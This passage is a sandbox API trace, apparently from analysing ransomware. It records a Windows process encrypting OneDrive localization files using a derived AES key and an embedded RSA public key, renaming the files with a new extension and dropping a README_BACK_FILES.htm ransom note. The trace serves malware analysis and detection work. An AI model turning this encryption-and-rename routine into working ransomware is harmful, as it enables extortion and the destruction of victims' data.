(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.999] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0280.001] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0280.002] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0280.002] CryptDestroyKey (hKey=0x2fb688) returned 1 [0280.003] CryptReleaseContext (hProv=0x2f2ddf8, dwFlags=0x0) returned 1 [0280.003] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0280.003] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0280.003] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\readme_back_files.htm")) returned 0xffffffff [0280.003] AreFileApisANSI () returned 1 [0280.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28894e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0280.003] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0280.004] GetFileType (hFile=0x5d4c) returned 0x1 [0280.004] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0280.005] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.006] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0280.006] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.006] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.006] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0280.010] GetLastError () returned 0x0 [0280.010] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui")) returned 0x20 [0280.010] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0280.011] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0280.012] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\lb-lu\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0280.023] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\lb-lu\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0280.024] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1e2b0) returned 1 [0280.027] CryptCreateHash (in: hProv=0x2f1e2b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0280.027] lstrlenA (lpString="TXNdkJRdVYjLbGOsIhrFFzdHzMlQm") returned 29 [0280.027] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0280.027] CryptDeriveKey (in: hProv=0x2f1e2b0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0280.027] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0280.027] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0280.027] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1edd8) returned 1 [0280.028] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1edd8, dwCertEncodingType=0x1, pInfo=0x2f36460*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36490*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36498*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbd88) returned 1 [0280.028] CryptEncrypt (in: hKey=0x2fbd88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0280.028] CryptEncrypt (in: hKey=0x2fbd88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1eaa8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1eaa8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0280.028] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f1eaa8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1eaa8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0280.030] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.070] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.165] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.166] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.168] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, 